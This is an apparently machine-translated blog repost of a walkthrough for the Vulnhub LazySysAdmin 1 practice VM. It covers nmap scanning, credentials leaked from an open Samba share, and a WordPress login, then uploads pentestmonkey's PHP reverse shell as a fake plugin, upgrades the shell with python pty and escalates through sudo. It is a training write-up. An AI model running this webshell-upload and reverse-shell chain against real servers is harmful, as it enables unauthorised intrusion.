Vulnhub drone: LAZYSYSADMIN_ 1

Language 2023-09-16 22:33:32 views: null

Table of contents

introduce

Series: LazySysAdmin (1 unit in this series)
Release date: September 20, 2017
Difficulty: Beginner
Operating environment: VMware Workstation
Goal: Obtain Root permissions
Learning:

  • Samba sensitive information leaked
  • wordpress hangs horse

Target drone address: https://www.vulnhub.com/entry/lazysysadmin-1,205/

collect message

netdiscover host discovery

sudo netdiscover -i eth0 -r 192.168.229.0/24

Host information detection
found that SSH is running on port 777

nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144

image.png

Test samba security

Found a shared directory with read-only permissions and logged in using an empty password. As a result, many file directories were found.

smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$

image.png
Use get to download the files you are interested in.
image.png
Find an account password through the configuration file: Admin/TogieMYSQL12345^^
image.png
. There is also a password: 12345
image.png

Login to the website

The homepage of the website is a static page with no valuable information.
image.png
After a simple directory blast, I discovered wordpress: dirsearch -u http://192.168.229.144/ --full-url -x 404,403
the content on the page kept telling us that his name is togie, so let’s try logging in next.
image.png
Access the default backend address: http://192.168.229.144/wordpress/wp-admin
and Admin/TogieMYSQL12345^^log in successfully.
image.png
Attackers often use the plug-in function to rebound the shell. Let’s start to demonstrate a process of using WordPress to get the shell.
image.png

zip self-extracting webshell

  1. Download the file for the rebound shell

https://pentestmonkey.net/tools/web-shells/php-reverse-shell
image.png

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php

This file has been built into kali and is located at: /usr/share/webshells/php/php-reverse-shell.php

  1. Edit file

Set the address and port of the rebound shell.
image.png
Edit the header file of the fake plug-in. This step is optional.
image.png

  1. Install plugin

image.png
Shows successful installation
image.png

  1. Get shell
http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php

image.png

Elevate privileges

First fix the shell:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color

I found that I could escalate the privileges to togie, and then sudo escalated the privileges.
image.png

Guess you like

Origin blog.csdn.net/weixin_44288604/article/details/132410108
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com